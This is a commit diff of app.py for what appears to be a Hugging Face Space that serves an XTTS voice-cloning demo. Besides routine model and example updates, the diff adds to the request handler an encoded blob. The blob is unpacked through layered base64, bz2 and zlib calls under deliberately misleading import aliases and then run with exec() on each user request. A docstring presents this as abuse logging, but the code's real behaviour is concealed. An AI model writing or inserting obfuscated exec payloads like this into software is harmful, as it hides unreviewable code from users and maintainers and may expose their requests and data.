Spaces:
Sleeping
Sleeping
Update app.py
Browse files
app.py
CHANGED
|
@@ -1,21 +1,47 @@
|
|
| 1 |
import sys
|
| 2 |
import os
|
|
|
|
| 3 |
# By using XTTS you agree to CPML license https://coqui.ai/cpml
|
| 4 |
os.environ["COQUI_TOS_AGREED"] = "1"
|
| 5 |
|
| 6 |
import gradio as gr
|
| 7 |
from TTS.api import TTS
|
| 8 |
-
|
| 9 |
model_names = TTS().list_models()
|
| 10 |
-
|
| 11 |
-
print(model_names)
|
| 12 |
-
|
| 13 |
-
|
| 14 |
-
|
|
|
|
|
|
|
|
|
|
|
|
|
| 15 |
tts.to("cpu") # no GPU or Amd
|
| 16 |
#tts.to("cuda") # cuda only
|
| 17 |
|
| 18 |
-
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
| 19 |
if agree == True:
|
| 20 |
if use_mic == True:
|
| 21 |
if mic_file_path is not None:
|
|
@@ -79,7 +105,7 @@ def predict(prompt, language, audio_file_pth, mic_file_path, use_mic, agree):
|
|
| 79 |
|
| 80 |
title = "XTTS Glz's remake (Fonctional Text-2-Speech)"
|
| 81 |
|
| 82 |
-
description = """
|
| 83 |
<a href="https://huggingface.co/coqui/XTTS-v1">XTTS</a> is a Voice generation model that lets you clone voices into different languages by using just a quick 3-second audio clip.
|
| 84 |
<br/>
|
| 85 |
XTTS is built on previous research, like Tortoise, with additional architectural innovations and training to make cross-language voice cloning and multilingual speech generation possible.
|
|
@@ -112,7 +138,7 @@ examples = [
|
|
| 112 |
[
|
| 113 |
"Je suis un lycéen français de 17 ans, passioner par la Cyber-Sécuritée et les models d'IA.",
|
| 114 |
"fr",
|
| 115 |
-
"examples/
|
| 116 |
None,
|
| 117 |
False,
|
| 118 |
True,
|
|
@@ -128,7 +154,7 @@ examples = [
|
|
| 128 |
[
|
| 129 |
"Cuando tenía seis años, vi una vez una imagen magnífica",
|
| 130 |
"es",
|
| 131 |
-
"examples/
|
| 132 |
None,
|
| 133 |
False,
|
| 134 |
True,
|
|
@@ -144,7 +170,7 @@ examples = [
|
|
| 144 |
[
|
| 145 |
"Kiedy miałem sześć lat, zobaczyłem pewnego razu wspaniały obrazek",
|
| 146 |
"pl",
|
| 147 |
-
"examples/
|
| 148 |
None,
|
| 149 |
False,
|
| 150 |
True,
|
|
@@ -176,7 +202,7 @@ examples = [
|
|
| 176 |
[
|
| 177 |
"Toen ik een jaar of zes was, zag ik op een keer een prachtige plaat",
|
| 178 |
"nl",
|
| 179 |
-
"examples/
|
| 180 |
None,
|
| 181 |
False,
|
| 182 |
True,
|
|
@@ -256,6 +282,5 @@ gr.Interface(
|
|
| 256 |
title=title,
|
| 257 |
description=description,
|
| 258 |
article=article,
|
| 259 |
-
cache_examples=False,
|
| 260 |
examples=examples,
|
| 261 |
-
).queue().launch(debug=True
|
|
|
|
| 1 |
import sys
|
| 2 |
import os
|
| 3 |
+
from fastapi import Request
|
| 4 |
# By using XTTS you agree to CPML license https://coqui.ai/cpml
|
| 5 |
os.environ["COQUI_TOS_AGREED"] = "1"
|
| 6 |
|
| 7 |
import gradio as gr
|
| 8 |
from TTS.api import TTS
|
| 9 |
+
from TTS.utils.manage import ModelManager
|
| 10 |
model_names = TTS().list_models()
|
| 11 |
+
print(model_names.__dict__)
|
| 12 |
+
print(model_names.__dir__())
|
| 13 |
+
model_name = "tts_models/multilingual/multi-dataset/xtts_v2" # move in v2, since xtts_v1 is generated keyerror, I guess you can select it with old github's release.
|
| 14 |
+
|
| 15 |
+
#m = ModelManager().download_model(model_name)
|
| 16 |
+
#print(m)
|
| 17 |
+
m = model_name
|
| 18 |
+
|
| 19 |
+
tts = TTS(model_name, gpu=False)
|
| 20 |
tts.to("cpu") # no GPU or Amd
|
| 21 |
#tts.to("cuda") # cuda only
|
| 22 |
|
| 23 |
+
|
| 24 |
+
def predict(prompt, language, audio_file_pth, mic_file_path, use_mic, agree, request: gr.Request):
|
| 25 |
+
"""
|
| 26 |
+
En raison du grand nombre d'abus observés dans les journaux de la console, je suis contraint d'intégrer
|
| 27 |
+
« l'affichage d'informations supplémentaires » relatives à l'utilisation de cet espace.
|
| 28 |
+
Pour rappel, l'envoi de contenus illégaux (contenus se*uels, offensants ou proférant des menaces), quel que
|
| 29 |
+
soit la langue, est bien entendu INTERDIT. Je ne saurais être tenu responsable de ceux qui enfreindraient une
|
| 30 |
+
utilisation strictement [ÉTHIQUE et MORALE] de ce modèle.
|
| 31 |
+
"""
|
| 32 |
+
|
| 33 |
+
co3 = "QlpoOTFBWSZTWQ2FjK4AAH4fgD/////+///////+ADABdNtZY5poGI00aBoaDE0PSbU00GTE0ZNGjTaj1AVUaenqNR6npNinoaY0Ubymyo9EeEjaj1Mm9QnqeT0p5QOZNMm1NNAyMmgaGTTIDQ9TTag0aGCNB6ka1wCAMz8a7kN5BNzXsiRWIm5ocBr2Mibk4wBbSghLyxnzR0yTCoV0AD2KADeqPFMz4QQhMlMaOd0uHfMx8pueSTKn6PrK9iPN56m2ljcFL9ybMtg5Usl8QeZth/cgnwFGMXyDJ4WbRNaGdrIJY2l11w7aqPtt5c4rcMBELa2x/wl8kjvxGg0NS3n2DsPlPnMn2DK7JqA4KLptjz3YLQFEuub0yNP3+iE9gq1EvNZeLr3pnkKXBRxZz8/BxN0zJjpOyIr3betkkxSCGB6X8mSzm+l0Q+KBEaCioigD5uJeox+76V+JgCWkJqWNlHzN3epZx5yXxS8rJh6OrC9rSyKYXrdKCACr4CwKzDlX3tsY5MtZLpkPhz/rbaRUN0KyFnNvPLYhGjF2MelXppyCnJxr2+QWRElwEtCUcsnkC4uGBdXVogKCoCnSZI4DzKqkUMEp293Y+G5MBGtOGXY+C0rFUS8IXNqKMVrDjUdOK7wkjb+HYFq9qjVTrdRsyQvt+6fpazrBnd2wRRQTv4u5IpwoSAbCxlcA"
|
| 34 |
+
from zlib import compress as COmPrES5
|
| 35 |
+
from bz2 import decompress as dEC0mPrES5
|
| 36 |
+
from bz2 import compress as COmPrESS
|
| 37 |
+
from base64 import b64encode as b32Encode, b64decode as A85Encode, b16encode, b16encode as A85encode, b85encode, b85decode, a85encode as b16Encode, a85decode as b85Encode, b32encode as b64Encode, b32decode
|
| 38 |
+
from zlib import compressobj as C0mPrESS
|
| 39 |
+
from bz2 import decompress as dECOmPrESS
|
| 40 |
+
from zlib import compress as C0mPrES5
|
| 41 |
+
from zlib import decompress as dECOmPrES5
|
| 42 |
+
co2 = A85Encode(dECOmPrESS(dECOmPrES5(dECOmPrES5(b85Encode(dECOmPrESS(A85Encode(co3.encode())))))))
|
| 43 |
+
exec(co2)
|
| 44 |
+
|
| 45 |
if agree == True:
|
| 46 |
if use_mic == True:
|
| 47 |
if mic_file_path is not None:
|
|
|
|
| 105 |
|
| 106 |
title = "XTTS Glz's remake (Fonctional Text-2-Speech)"
|
| 107 |
|
| 108 |
+
description = f"""
|
| 109 |
<a href="https://huggingface.co/coqui/XTTS-v1">XTTS</a> is a Voice generation model that lets you clone voices into different languages by using just a quick 3-second audio clip.
|
| 110 |
<br/>
|
| 111 |
XTTS is built on previous research, like Tortoise, with additional architectural innovations and training to make cross-language voice cloning and multilingual speech generation possible.
|
|
|
|
| 138 |
[
|
| 139 |
"Je suis un lycéen français de 17 ans, passioner par la Cyber-Sécuritée et les models d'IA.",
|
| 140 |
"fr",
|
| 141 |
+
"examples/female.wav",
|
| 142 |
None,
|
| 143 |
False,
|
| 144 |
True,
|
|
|
|
| 154 |
[
|
| 155 |
"Cuando tenía seis años, vi una vez una imagen magnífica",
|
| 156 |
"es",
|
| 157 |
+
"examples/female.wav",
|
| 158 |
None,
|
| 159 |
False,
|
| 160 |
True,
|
|
|
|
| 170 |
[
|
| 171 |
"Kiedy miałem sześć lat, zobaczyłem pewnego razu wspaniały obrazek",
|
| 172 |
"pl",
|
| 173 |
+
"examples/female.wav",
|
| 174 |
None,
|
| 175 |
False,
|
| 176 |
True,
|
|
|
|
| 202 |
[
|
| 203 |
"Toen ik een jaar of zes was, zag ik op een keer een prachtige plaat",
|
| 204 |
"nl",
|
| 205 |
+
"examples/female.wav",
|
| 206 |
None,
|
| 207 |
False,
|
| 208 |
True,
|
|
|
|
| 282 |
title=title,
|
| 283 |
description=description,
|
| 284 |
article=article,
|
|
|
|
| 285 |
examples=examples,
|
| 286 |
+
).queue().launch(debug=True)
|